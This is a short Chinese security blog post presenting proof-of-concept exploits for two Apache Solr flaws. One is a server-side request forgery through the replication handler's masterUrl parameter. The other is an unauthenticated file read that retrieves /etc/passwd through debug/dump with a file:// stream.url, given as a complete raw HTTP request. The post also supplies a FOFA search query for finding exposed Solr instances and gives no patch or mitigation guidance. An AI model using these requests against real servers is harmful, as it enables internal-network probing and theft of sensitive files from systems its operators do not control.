Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

Apache Solr SSRF漏洞和任意文件读取漏洞

漏洞复现 Adminxe 3731℃ 0评论

1、SSRF

描述

Apache Solr存在服务器端请求伪造漏洞。攻击者可以传递特定参数,使得服务端发起请求,成功利用该漏洞可造成内网信息探测。 影响范围:Apache Solr < 8.8.2 fofa app=”APACHE-Solr”

POC & EXP

# 这里masterUrl为你想访问的链接
http://127.0.0.1:8983/solr/db/replication\?command=fetchindex\&masterUrl=http://xxxx

2、任意文件读取漏洞

描述

Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。 影响版本:Apache Solr <= 8.8.1

POC &EXP

构造读取/etc/passwd的包

POST /solr/demo/./debug/dump?param=ContentStreams HTTP/1.1
Host: 127.0.0.1:8983
Content-Length: 29
Content-Type: application/x-www-form-urlencoded
Connection: close
 
stream.url=file:///etc/passwd

转载请注明:Adminxe's Blog » Apache Solr SSRF漏洞和任意文件读取漏洞

喜欢 (5)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址